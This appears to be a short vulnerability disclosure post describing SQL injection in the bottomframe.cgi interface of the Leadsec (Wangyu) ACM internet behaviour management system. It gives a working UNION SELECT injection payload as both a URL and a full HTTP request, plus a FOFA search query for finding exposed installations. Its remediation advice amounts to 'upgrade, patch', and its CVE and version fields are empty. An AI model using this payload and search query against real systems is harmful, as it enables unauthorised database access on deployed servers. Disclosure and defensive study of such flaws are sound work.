There is a SQL injection vulnerability in the bottomframe.cgi interface of Wangyu ACM Internet Behavior Management System
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. System introduction
Leadsec Online Behavior Management System (Leadsec ACM for short) is a comprehensive solution provided by Leadsec for Internet access users in terms of information content security, network application management, organization and operation efficiency, network resource utilization, legal risk avoidance, and network return on investment. plan. There is a SQL injection vulnerability in Wangyu's online behavior management system.
2. Vulnerability description
There is a SQL injection vulnerability in the bottomframe.cgi interface of Wangyu ACM Internet Behavior Management System. Through the vulnerability, attackers can obtain server database permissions to perform sensitive operations.
CVE number:
CNNVD number:
CNVD number:
3. Impact version
4. fofa query statement
app="Net Royal Nebula-Internet Behavior Management System"
5. Vulnerability recurrence
Vulnerability link: https://127.0.0.1/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
Vulnerability Packet:
GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Execute the md5(1) function
Execute user()
6.POC&EXP
Xiaolong POC Portal 【Updated】: Xiaolong POC Tool
7. Repair suggestions
upgrade, patch